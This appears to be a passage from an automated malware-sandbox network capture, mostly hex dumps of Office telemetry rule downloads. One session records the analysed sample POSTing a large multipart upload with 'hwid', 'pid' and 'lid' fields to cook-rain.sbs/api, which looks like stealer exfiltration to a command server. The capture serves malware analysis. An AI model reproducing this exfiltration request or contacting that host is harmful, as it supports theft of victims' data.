                                                                                                                                                                              x-azure-ref: 20241121T073026Z-178bfbc474bgvl54hC1NYCsfuw0000000170000000001yfh
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:26 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              29192.168.2.649741188.114.96.34433180C:\Users\user\Desktop\file.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:26 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=VQG4P9DCX
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 569831
                                                                                                                                                                              Host: cook-rain.sbs
                                                                                                                                                                              2024-11-21 07:30:26 UTC15331OUTData Raw: 2d 2d 56 51 47 34 50 39 44 43 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 37 32 30 44 35 36 34 45 34 46 30 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 0d 0a 2d 2d 56 51 47 34 50 39 44 43 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 56 51 47 34 50 39 44 43 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 56 51 47 34 50 39 44 43 58 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                              Data Ascii: --VQG4P9DCXContent-Disposition: form-data; name="hwid"493720D564E4F0CB63CFCF7E6C45F838--VQG4P9DCXContent-Disposition: form-data; name="pid"1--VQG4P9DCXContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--VQG4P9DCXConten
                                                                                                                                                                              2024-11-21 07:30:26 UTC15331OUTData Raw: d1 fb 99 e1 02 47 4d 75 84 e5 b9 f1 d2 00 e7 cd d2 ff ee 2b f8 ff be 64 00 7a 45 37 98 c5 81 44 0b 6a 31 17 b0 6b 7f 2d 67 32 6d 32 47 63 7d 53 d8 25 14 bf 6d 28 de 4e 4a c8 c1 38 78 2b ce dc b9 e7 57 d3 93 1b 10 01 17 d3 b2 9d 3d 71 a0 4d 99 f7 87 05 3a 7e 5b 9e 73 35 a4 a4 01 53 b7 09 2a 75 68 01 9b 6f 33 23 93 de 99 b3 c5 fa e4 e8 2e 3c 28 6e 34 22 e5 c9 e2 94 06 ff bb 6e 32 b5 ce 4a 51 7b 18 56 60 55 02 3b 0f fe 8f ca 2a 4c f9 59 cc 1c 05 89 09 82 dc 95 b9 cd 2e e2 3c d2 8a 72 03 77 31 c7 37 54 53 98 4c a2 21 5e 47 78 43 6e e5 53 08 6c bc ad f4 41 a4 29 16 f6 ff 09 ad 6d c5 a9 9a dd b1 0e ab 54 76 80 c8 13 cd 8d 9d 69 9d fc 09 f3 ab 75 75 f6 31 41 17 da d3 a3 ad 22 23 be e0 8e ef a6 a1 52 2b cf 74 76 e6 ef 54 2a 5b 87 75 be e7 b3 6d 1b 69 08 ec 81 f8
                                                                                                                                                                              Data Ascii: GMu+dzE7Dj1k-g2m2Gc}S%m(NJ8x+W=qM:~[s5S*uho3#.<(n4"n2JQ{V`U;*LY.<rw17TSL!^GxCnSlA)mTviuu1A"#R+tvT*[umi
                                                                                                                                                                              2024-11-21 07:30:26 UTC15331OUTData Raw: 87 21 cc 22 ad 66 cd ab cc 3a f7 71 73 d1 a7 a3 b7 33 7e 3d ae 66 51 a1 ed 77 99 9d c5 7f 0d 76 1b 0b c0 5a c5 8e 18 51 a6 53 1e 1a c9 f7 ad a2 9a 4d a9 f7 b9 b2 17 19 12 9b c3 9a 01 b8 4b e6 ec 60 41 b2 10 3f 94 04 5e 7e 8f 7e a2 5a 66 48 cf dd d1 62 bc b1 fd a8 6a d2 1c 22 ef aa ad 73 58 d9 9d d8 c7 db 90 60 bb 0a ec 18 e2 92 52 76 aa fa f3 cb d8 d1 48 a6 7a e9 50 ba 98 59 2b 43 1e 9a 34 6a 24 b7 e8 35 51 92 96 f5 ff 02 4b e1 98 24 05 b5 49 11 2a 81 7d e3 e3 81 63 37 07 f0 f6 39 49 60 29 33 94 34 f3 44 98 34 35 bd 3a f1 86 52 cb af d8 9b 5e da a3 bf 31 7d 9c 8a c4 16 c2 16 15 f2 d5 93 32 4e 0e f6 ab 16 53 0f bb 04 cd e1 48 93 41 35 c8 91 ce 72 ac 75 f8 19 5e c6 ba 41 3c 68 f2 43 9d 87 07 f7 19 92 d1 47 d5 8e 76 81 1d 98 c7 9e 76 ef 29 bf e8 1d ff fa 8c
                                                                                                                                                                              Data Ascii: !"f:qs3~=fQwvZQSMK`A?^~~ZfHbj"sX`RvHzPY+C4j$5QK$I*}c79I`)34D45:R^1}2NSHA5ru^A<hCGvv)
                                                                                                                                                                              2024-11-21 07:30:26 UTC15331OUTData Raw: 1d 7a d7 5f 2e 96 6f 71 8f 60 7c 06 66 3e a6 85 4d 6b b4 30 fe 36 d8 99 59 df f1 13 63 74 85 b8 a5 cb c0 62 f2 b5 15 9c ef 7e d7 94 e8 d0 38 33 56 f1 b0 22 ed 91 be f8 df e4 ba d6 ea aa 22 1b 4e de df 72 82 e9 2f 73 cd 47 be 77 4f b5 ff 1b 1e a8 43 54 3d 26 f5 61 0e dc 3f b6 3f 76 72 45 9b 4d ad fe 72 2a 6d 21 b8 71 2d b6 ec 8b e1 f5 f1 3b 6b 46 53 7c c7 69 a9 a1 ac dc ab 7f 9d d8 f4 fe 64 a8 40 0b 71 fc fa 2d 76 63 6a 41 d6 0a 5f 38 b3 50 95 90 7e 2e 74 be 3f cc e1 53 7d f5 df ee 72 3f e5 5a 2f b6 72 aa c6 22 44 52 03 fd 07 59 6a 32 3e cb 13 6b 2f bd 97 4f 9b f0 81 f6 25 4e cc 2c c3 de 11 ab 54 71 40 51 75 98 d6 fe 6b b8 67 3f a7 93 c3 0a 55 70 5f fe 9a 8b f6 7f aa c1 bb 22 a5 72 8a d7 c4 0a ff 6b 44 e8 ee 91 c1 bc 15 63 45 ad 6d ea d2 75 b5 e6 97 34 27
                                                                                                                                                                              Data Ascii: z_.oq`|f>Mk06Yctb~83V""Nr/sGwOCT=&a??vrEMr*m!q-;kFS|id@q-vcjA_8P~.t?S}r?Z/r"DRYj2>k/O%N,Tq@Qukg?Up_"rkDcEmu4'
                                                                                                                                                                              2024-11-21 07:30:26 UTC15331OUTData Raw: f0 bb d5 a8 22 e7 34 b1 38 fd 46 1a b4 60 85 31 0e 42 8c f5 60 4f 5c a1 31 9d 00 ba f0 85 f1 9b d3 8a 86 a2 b7 7a 53 f2 23 e9 1d 79 86 4a 18 ee af 82 e7 9b 48 cf 6b 07 e5 cf f3 41 35 04 70 be 59 ec 09 8b 3a c1 ec cb 29 48 db ea 11 de fd e8 91 b3 a8 fb d8 27 0f 93 15 a0 44 ea 0a 08 8d 7a 29 9b 85 2f c2 86 76 ef b2 e1 c2 48 c8 75 ab b3 58 d2 83 7c 25 3b 42 f3 df 7e 64 ab 81 a2 a6 a0 92 55 f4 af 93 e4 78 01 81 3f 73 ac 94 6b 73 b9 6b bc b5 fe ca 1a 17 b0 fb 6d fa 40 04 54 d0 6a ea 8a 2e b5 f1 ef 5d 3d 77 61 e1 e4 79 bf a4 45 9b 63 15 bf dc 8f bd 63 9a 9f 77 7e 44 27 2f f0 fc 67 ee d3 b1 af cc 7d 19 4d 37 4a 86 f9 fe 7f e7 ec ba 24 28 fd c5 83 54 82 79 90 19 03 cb ce bf 14 64 54 95 d3 d2 5a d1 25 00 e1 39 f2 98 e8 bb 83 b4 13 a0 e3 03 67 5b 28 e9 c0 51 1f 4b
                                                                                                                                                                              Data Ascii: "48F`1B`O\1zS#yJHkA5pY:)H'Dz)/vHuX|%;B~dUx?skskm@Tj.]=wayEccw~D'/g}M7J$(TydTZ%9g[(QK
                                                                                                                                                                              2024-11-21 07:30:26 UTC15331OUTData Raw: 79 cb 09 66 4e d0 48 50 9d c9 89 07 94 06 ab 02 e3 70 8f 7c 58 49 70 f1 7d c0 a4 c3 3c fe c8 0b 91 06 a7 a8 df b2 47 88 1f 12 cc 6d c3 bc 38 ef d9 a5 c5 72 2d 0f 36 cd cb a7 8d 26 e9 25 ff ce 8a a3 cc 5d 22 2f 50 6f 76 ee 3a 69 c8 70 fa 50 7b 27 55 71 99 a1 9b 49 2f 11 35 ba 12 32 fb 95 5c 17 54 ac 53 fb 53 44 4d 25 ee 83 3d ac 8b f5 f3 02 1f b1 89 4e e7 31 19 a6 7a 25 78 17 4d fc da a1 a3 61 8e 47 12 87 48 a7 c6 66 28 d3 5a b5 62 75 be ef 73 ee ee 1d 90 78 fc 86 aa b5 4d e4 8d 28 c2 ec cd d7 b5 1a 08 3f 02 20 95 31 3f ac 93 cf a0 f4 b0 8d f3 4f 94 01 bd cc 9c 4b 45 be 32 8a 50 78 34 71 3a 6a f3 76 80 86 5a 33 72 1b 7b f3 a3 c4 47 fa 4a 4d 92 12 3f 38 ac ab 5e 68 c9 42 c2 1e 18 38 1e 0b 59 2e 51 ec 89 a8 8f a2 99 f5 60 21 98 3d 4a 5b 42 8c 2a b4 28 a3 86
                                                                                                                                                                              Data Ascii: yfNHPp|XIp}<Gm8r-6&%]"/Pov:ipP{'UqI/52\TSSDM%=N1z%xMaGHf(ZbusxM(? 1?OKE2Px4q:jvZ3r{GJM?8^hB8Y.Q`!=J[B*(
                                                                                                                                                                              2024-11-21 07:30:26 UTC15331OUTData Raw: 8f a4 a2 c6 d5 82 20 42 bc 4a 25 da 24 ed 30 78 38 ef 14 b0 f5 b6 71 86 3c 3d f9 e3 f0 9a c2 cb d9 c8 65 2d 72 c2 10 7a 23 27 50 6e b0 52 07 0a 7b c2 25 a1 a4 d7 b4 51 b8 7b e7 b4 9f 72 57 30 c8 25 3c 81 0b fe fb c4 81 f0 3e 12 63 28 26 5a 66 99 a8 32 c6 7d 1d 8a 0a 0d 3f ca 08 e5 6a 11 86 19 62 8b 0c eb a3 ae d7 8d ac 9c 30 5b 51 0b d8 9f e7 e8 53 2c 8b 04 a7 97 81 1e 66 2a d9 b3 95 3b 3c 6b fd 49 95 2b 12 53 6a b5 65 e8 38 11 d7 86 d2 2d 51 a8 4e fc 11 a5 48 30 ac 59 8b 8b 18 47 8e 5d e3 6f e8 f1 b1 bf 82 37 b0 72 1e b2 70 42 6c 0c 8b 7f 64 f8 91 93 70 08 43 ac c5 6c 62 cf bd 35 7b c5 f0 e0 23 7b 16 6f c8 4d e4 79 36 91 4b b6 2f 43 2f 9a 8c 54 17 38 26 66 46 5d 91 2e ab 03 12 7d c1 9b 68 04 77 69 c5 a6 7c e8 ad 2a 17 3f bd 17 45 49 a0 f3 4e e0 71 8b 67
                                                                                                                                                                              Data Ascii: BJ%$0x8q<=e-rz#'PnR{%Q{rW0%<>c(&Zf2}?jb0[QS,f*;<kI+Sje8-QNH0YG]o7rpBldpClb5{#{oMy6K/C/T8&fF].}hwi|*?EINqg
                                                                                                                                                                              2024-11-21 07:30:26 UTC15331OUTData Raw: 03 1e 73 dc 98 be 86 7b 24 9f 32 78 d4 e0 5c 4e 6c fa b9 61 d6 ed b7 48 67 99 c2 63 0d 85 90 60 79 d4 ca fd ed e4 e4 a8 f2 90 7e 62 d1 97 da d7 2c eb a9 9b 4d 29 6e ea fc f4 fc c8 2b 61 29 07 63 fa 96 8d 5b 16 bf 20 ff 0e d2 1d 9b d5 a3 07 b1 44 07 31 61 14 19 66 dc 98 4b 53 2f 17 f9 ae e3 46 7c 7b 9b c7 04 e8 1a d5 5c df 03 c4 36 a0 13 0b 77 fe 36 5b 66 0c 9c 17 bd be b9 ca b0 5c 56 d4 13 b5 b3 cb 26 66 89 80 15 55 a2 97 d7 98 c4 8f ca ba f6 c0 59 08 ae 7a 9c 64 49 56 ef 11 b8 3f 02 8d fd 46 c0 36 fa b5 6c 63 c6 1e 20 98 65 da 8d 88 4f 17 e7 39 49 96 9c 92 c7 3f 8b d4 34 c4 2f e8 c3 f5 4b 7c e0 4b 64 41 c5 1d 38 54 f8 08 2d 41 15 d8 cd fc 1d 7f c6 ee c8 c1 77 fe 87 38 cb af 8f 1f b7 cd 1e 3b f9 30 d2 3c 94 66 0b 91 27 ea 92 1f bc 56 03 42 6f 0e 53 e4 21
                                                                                                                                                                              Data Ascii: s{$2x\NlaHgc`y~b,M)n+a)c[ D1afKS/F|{\6w6[f\V&fUYzdIV?F6lc eO9I?4/K|KdA8T-Aw8;0<f'VBoS!
                                                                                                                                                                              2024-11-21 07:30:26 UTC15331OUTData Raw: 4b ca 18 50 3c 67 08 11 e8 e9 5a 4c 73 0a 0a b1 f9 73 12 38 ef 49 71 ab f1 41 5f 35 73 5a 8c 56 13 72 0d 00 d1 4f a8 66 4e cc 78 6f 50 af 48 9b de ac 0f 22 d2 88 34 3d a5 2d 1a bf 3b 49 92 f7 a6 8f 86 06 ca bf 72 2f 44 64 57 3f 08 97 ca 61 21 f9 9a 38 e6 8a 8e f5 62 88 f7 d3 65 63 bc 93 23 f4 61 be 57 0b f9 9e 03 9c 9e 22 38 d4 07 a5 e7 4f e8 b4 f2 3c bc 12 96 79 7a 0f 1b 08 04 73 71 bc 9b 35 b5 8a 40 f2 08 95 ca 66 a6 57 20 e6 ef af 42 df c4 e2 fa 43 7d c1 8b be b9 33 1d 4d 2e e8 d0 9e dd e4 f5 c6 63 b8 32 86 ab 42 61 63 48 3f 36 4e f7 93 6c 6a 98 0c 40 4c d7 72 9e ee c0 24 8f f2 31 67 51 4b f5 c1 61 c4 c6 f0 db b6 3b 2d ca ec 88 d4 e1 81 b5 93 a4 5b a1 82 d9 46 27 cb 35 75 94 cb 75 2c bd 04 39 35 c9 e3 95 d6 5a 73 39 02 56 3d ff 5a 00 22 3c bb 3d cf a8
                                                                                                                                                                              Data Ascii: KP<gZLss8IqA_5sZVrOfNxoPH"4=-;Ir/DdW?a!8bec#aW"8O<yzsq5@fW BC}3M.c2BacH?6Nlj@Lr$1gQKa;-[F'5uu,95Zs9V=Z"<=
                                                                                                                                                                              2024-11-21 07:30:26 UTC15331OUTData Raw: cf 0c c4 f8 58 0c c0 b1 eb 27 31 48 6d ec 91 56 3e 5f bd 72 47 9f 15 6e a9 1e 66 70 00 08 cf bf dd ea ae 35 aa ad c9 90 e0 6c 07 2f a6 04 0a 11 6c 72 d7 e8 3d 23 fc 9e 33 8f 27 7c 8b 38 7b c5 2c b9 f5 c1 1d f2 f2 6e 47 58 53 a0 ac 3b 4e 3a c0 da 63 b9 41 50 bd 0d 45 76 90 40 31 dd 45 61 4a 98 3f 76 13 bd 3a a2 f1 29 3c 6f 74 e6 62 a1 3b 94 e1 ec a9 2c e1 09 d3 5c e5 66 cc 7b a2 3f a9 b9 55 47 84 c4 70 f6 29 c4 fa c5 20 79 b2 c6 48 82 cf 86 dd 60 cd 33 81 d4 3f ee 03 f4 58 50 f7 27 4b 95 41 fc 1a 17 6f 10 66 50 c6 0e 90 6b 65 49 9f 70 31 31 08 c1 65 a6 fb e1 26 07 59 ec f1 e5 53 9f 70 10 e0 9f f5 76 ff 2c 9f bd 71 f8 cc cd 15 41 f0 66 af 4d 5f f4 b5 d3 c9 36 02 cc 04 73 86 81 ee 16 7e 53 04 65 52 62 9b a0 6e 7d d7 48 62 69 7b f3 88 ce f3 0a 7b d9 67 7c b5
                                                                                                                                                                              Data Ascii: X'1HmV>_rGnfp5l/lr=#3'|8{,nGXS;N:cAPEv@1EaJ?v:)<otb;,\f{?UGp) yH`3?XP'KAofPkeIp11e&YSpv,qAfM_6s~SeRbn}Hbi{{g|
                                                                                                                                                                              2024-11-21 07:30:30 UTC990INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:30 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=hn5u3t5k2kn302k6glm11btvpg; expires=Mon, 17-Mar-2025 01:17:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I9CIFiWOOcjbMeQnuuB2ET7nynpQDrEF140hSIO%2FwUhh6dVHFTu8VjgXf1O%2Bw7CWaELrPaHhpfC0n2ihCkN1NDZDRwlnNibdAQuD7dOHNH6IkK%2BdYFYF6t3vJBD%2Fz0Wr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8e5ef973c99042b5-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1756&sent=201&recv=591&lost=0&retrans=0&sent_bytes=2830&recv_bytes=572366&delivery_rate=1635854&cwnd=214&unsent_bytes=0&cid=e2453c579df26db4&ts=4554&x=0"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              30192.168.2.64974013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:26 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:26 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                              ETag: "0x8DC582BB7010D66"
                                                                                                                                                                              x-ms-request-id: 8b710333-301e-0020-767a-3b6299000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073026Z-178bfbc474bbbqrhhC1NYCvw7400000001a00000000075xd
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:27 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              31192.168.2.64974313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:27 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:28 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                              ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                              x-ms-request-id: 2b92647c-c01e-00a2-646f-3b2327000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073028Z-1777c6cb754b7tdghC1TEBwwa40000000aw000000000b7pb
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:28 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              32192.168.2.64974213.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:27 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:28 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:28 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                              ETag: "0x8DC582B9748630E"
                                                                                                                                                                              x-ms-request-id: 367ebca4-601e-0070-6762-3ba0c9000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073028Z-178bfbc474bbbqrhhC1NYCvw74000000018g00000000acbk
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:28 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              33192.168.2.64974413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:27 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:28 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
